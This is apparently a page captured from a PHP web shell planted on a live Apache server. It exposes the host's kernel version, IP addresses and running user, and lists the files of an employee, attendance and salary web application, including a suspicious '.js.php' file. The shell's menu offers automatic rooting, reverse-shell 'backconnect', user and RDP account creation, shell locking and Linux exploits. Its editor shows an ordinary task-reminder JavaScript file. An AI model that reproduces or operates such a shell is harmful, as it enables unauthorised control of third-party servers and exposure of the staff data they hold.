Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.133.153.224
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
oums /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.js.php
3.61
KB
-rw-r--r--
attendance.js
8.79
KB
-rwxr-xr-x
attendance13.09.2020.js
7.5
KB
-rwxr-xr-x
attendance_report.js
16.7
KB
-rwxr-xr-x
control.js
5.43
KB
-rwxr-xr-x
departments.js
11.45
KB
-rwxr-xr-x
documents.js
4.05
KB
-rwxr-xr-x
employees.js
24.3
KB
-rw-rw-r--
employees_arun.js
20.18
KB
-rwxr-xr-x
expense.js
7.21
KB
-rwxr-xr-x
expense_advance.js
4.6
KB
-rwxr-xr-x
expense_advance2.js
4.56
KB
-rw-rw-r--
expense_report.js
10.97
KB
-rwxr-xr-x
expense_report_summary.js
3.52
KB
-rwxr-xr-x
holidays.js
5.67
KB
-rwxr-xr-x
index.js
4.82
KB
-rwxr-xr-x
main.js
9.14
KB
-rwxr-xr-x
mainpage.js
17.48
KB
-rwxr-xr-x
mc_print.js
6.76
KB
-rwxr-xr-x
pg_app_edit.js
25.8
KB
-rwxr-xr-x
salary.js
4.72
KB
-rwxr-xr-x
salary_statement.js
4.21
KB
-rw-rw-r--
send_mail.js
1.27
KB
-rwxr-xr-x
send_sms.js
1.07
KB
-rwxr-xr-x
staff_move.js
6.49
KB
-rwxr-xr-x
task_reminder.js
7.92
KB
-rwxr-xr-x
task_reminder_old.js
4.94
KB
-rwxr-xr-x
task_review.js
5.74
KB
-rwxr-xr-x
task_update.js
5.74
KB
-rwxr-xr-x
upcoming_events.js
13.34
KB
-rw-rw-r--
user_departments.js
2.95
KB
-rwxr-xr-x
user_logs.js
2.63
KB
-rwxr-xr-x
user_password.js
3.97
KB
-rwxr-xr-x
user_rights.js
5.37
KB
-rwxr-xr-x
user_setup.js
6.31
KB
-rwxr-xr-x
work_assign.js
5.41
KB
-rw-rw-r--
work_entry.js
9.21
KB
-rwxr-xr-x
work_entry_org.js
4.26
KB
-rwxr-xr-x
work_entry_report.js
5.33
KB
-rwxr-xr-x
work_review.js
8.67
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : task_reminder.js
function load_page() { load_page_data( window.location.href.substr(window.location.href.lastIndexOf("/") + 1) ); cncl_data(); } function cncl_data() { $("#page-container-body").load("task_reminder_grid.php", function () { $("#btn_addn").show(); $("#btn_save").hide(); $("#btn_cncl").hide(); load_grid_data(20, 1); }); } function load_grid_data(page_limt, page_numb) { $.ajax({ type: "POST", url: "src/task_reminder.php", data: { load_data: "grid_data", page_limt: page_limt, page_numb: page_numb, task_stat: document.getElementById("seltaskstat").value, task_asby: document.getElementById("seltaskasby").value, task_asto: document.getElementById("seltaskasto").value, task_find: document.getElementById("txttaskfind").value, }, cache: false, success: function (data) { $("#page-container-grid").html(data); }, error: function (data) { $("#page-container-grid").html("Error: " + data); }, }); } function load_page_limt(page_limt) { load_grid_data(page_limt, 1); } function clrs_data() { $("#btn_addn").hide(); $("#btn_save").show(); $("#btn_cncl").show(); $(function () { $("#txttaskdate").datepicker({ dateFormat: "dd/mm/yy" }); }); $(function () { $("#txtstrtdate").datepicker({ dateFormat: "dd/mm/yy" }); }); $(function () { $("#txtlastdate").datepicker({ dateFormat: "dd/mm/yy" }); }); $(function () { $("#txtcompdate").datepicker({ dateFormat: "dd/mm/yy" }); }); $(function () { $("#txtremndat1").datepicker({ dateFormat: "dd/mm/yy" }); }); $(function () { $("#txtremndat2").datepicker({ dateFormat: "dd/mm/yy" }); }); $(function () { $("#txtremndat3").datepicker({ dateFormat: "dd/mm/yy" }); }); } function addn_data() { $("#page-container-body").load("task_reminder_form.php", function () { clrs_data(); document.getElementById("lblpagemode").innerHTML = "Add"; document.getElementById("txtpagemode").value = "add"; document.getElementById("txttaskdate").value = get_today_date(); document.getElementById("txtstrtdate").value = get_today_date(); document.getElementById("txtlastdate").value = get_today_date(); document.getElementById("txttaskname").focus(); document.getElementById("txttaskstat").disabled = true; document.getElementById("txtcompdate").disabled = true; document.getElementById("txttaskasby").disabled = true; document.getElementById("txttaskasto").disabled = false; $.when($.ajax(load_empl_list())).then(function () { $("#txttaskasby").val(document.getElementById("empl_id").value); $("#txttaskasto").val(document.getElementById("empl_id").value); }); }); } function edit_data(prim_data) { $("#page-container-body").load("task_reminder_form.php", function () { clrs_data(); document.getElementById("lblpagemode").innerHTML = "Edit"; document.getElementById("txtpagemode").value = "edit"; document.getElementById("txttaskname").focus(); document.getElementById("txttaskasby").disabled = true; document.getElementById("txttaskasto").disabled = false; $.ajax({ type: "POST", url: "src/task_reminder.php", data: { load_data: "disp_data", task_code: prim_data, }, cache: false, success: function (data) { var data = JSON.parse(data); document.getElementById("txttaskcode").value = data.ftaskcode; document.getElementById("txttaskdate").value = get_format_date( data.ftaskdate ); document.getElementById("txttaskname").value = data.ftaskname; document.getElementById("txttaskdetl").value = data.ftaskdetl; document.getElementById("txttaskasto").value = data.femplasto; document.getElementById("txtstrtdate").value = get_format_date( data.fstrtdate ); document.getElementById("txtlastdate").value = get_format_date( data.flastdate ); document.getElementById("txttaskstat").value = data.ftaskstat; document.getElementById("txtcompdate").value = get_format_date( data.fcompdate ); document.getElementById("txtremndat1").value = get_format_date( data.fremndat1 ); document.getElementById("txtremndat2").value = get_format_date( data.fremndat2 ); document.getElementById("txtremndat3").value = get_format_date( data.fremndat3 ); document.getElementById("txttaskremk").value = data.ftaskremk; // if (data.femplasto == document.getElementById("empl_id").value) { // alert("same"); // } set_task_comp_date(data.ftaskstat); $.when($.ajax(load_empl_list())).then(function () { $("#txttaskasby").val(data.ftaskasby); $("#txttaskasto").val(data.ftaskasto); }); }, error: function (data) { $("#page-container-form").html("Error: " + data); }, }); }); } function dele_data(prim_data) { var r = confirm("Delete Record?"); if (r == true) { $.ajax({ type: "POST", url: "src/task_reminder.php", data: { load_data: "dele_data", dele_code: prim_data, }, success: function (data) { load_grid_data(20, 1); }, }); } } function load_empl_list() { $.ajax({ type: "POST", url: "src/task_reminder.php", data: { load_data: "empl_list", }, cache: false, success: function (data) { $("#txttaskasby").html(data); $("#txttaskasto").html(data); }, error: function (data) { $("#txttaskasto").html("Error: " + data); }, }); } function save_data() { if (document.getElementById("txttaskasby").value == "") { alert("Please select task assigner!"); txttaskasby.focus(); return false; } if (document.getElementById("txttaskname").value == "") { alert("Please enter task title!"); txttaskname.focus(); return false; } if (document.getElementById("txttaskdetl").value == "") { alert("Please enter task description!"); txttaskdetl.focus(); return false; } if (document.getElementById("txttaskasto").value == 0) { alert("Please select task assinee!"); txttaskasto.focus(); return false; } if (document.getElementById("txttaskstat").value == "COMPLETED") { if ( document.getElementById("txtcompdate").value == "" || document.getElementById("txtcompdate").value == "00/00/0000" ) { alert("Please enter completed date!"); txtcompdate.focus(); return false; } } $.ajax({ type: "POST", url: "src/task_reminder.php", dataType: "json", data: { load_data: "save_data", page_mode: document.getElementById("txtpagemode").value, task_code: document.getElementById("txttaskcode").value, task_date: document.getElementById("txttaskdate").value, task_name: document.getElementById("txttaskname").value, task_detl: document.getElementById("txttaskdetl").value, task_stat: document.getElementById("txttaskstat").value, task_asby: document.getElementById("txttaskasby").value, task_asto: document.getElementById("txttaskasto").value, strt_date: document.getElementById("txtstrtdate").value, last_date: document.getElementById("txtlastdate").value, comp_date: document.getElementById("txtcompdate").value, remn_dat1: document.getElementById("txtremndat1").value, remn_dat2: document.getElementById("txtremndat2").value, remn_dat3: document.getElementById("txtremndat3").value, task_remk: document.getElementById("txttaskremk").value, }, cache: false, beforeSend: function () { show_process(); }, success: function (data) { hide_process(); alert(data.mesg); cncl_data(); }, error: function (data) { $("#page-container-form").html("Error:" + data); hide_process(); }, }); } function set_task_comp_date(task_stat) { if (task_stat == "COMPLETED") { document.getElementById("txtcompdate").disabled = false; document.getElementById("txtcompdate").value = get_today_date(); } else { document.getElementById("txtcompdate").disabled = true; document.getElementById("txtcompdate").value = "00/00/0000"; } }
Close